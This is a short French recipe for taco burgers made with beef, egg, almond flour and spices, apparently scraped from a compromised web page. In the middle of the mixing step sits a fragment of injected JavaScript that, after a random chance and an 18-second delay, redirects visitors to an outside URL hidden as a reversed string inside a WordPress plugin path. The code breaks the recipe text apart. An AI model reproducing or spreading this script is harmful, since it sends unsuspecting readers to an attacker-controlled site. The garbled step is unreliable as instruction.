
TACO BURGERS
Pour 4 Pers.
INGRÉDIENTS :
– ½ tasse de coriandre hachée
– 2 œufs
– 700g de bœuf haché (5%MG)
– ½ tasse de poudre d’amande
– 1 cc de piment
– 2 cc de cumin
– 2 cc d’ail en poudre
– 1 cs d’oignons hachés finement
– 1 cc de sel
Battre les oeufs en omelette dans un saladier
Rajouter toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les autres ingredients et bien mélanger.
Former 8 burgers et les aligner sur du papier de cuisson. Réserver au frais pendant 1 heure
Griller les burger 4-5 minutes de chaque coté
Le petit mot de Joanne : on peut servir ces burgers avec une salade de mandarines & graines aux choix
Bon appétit !
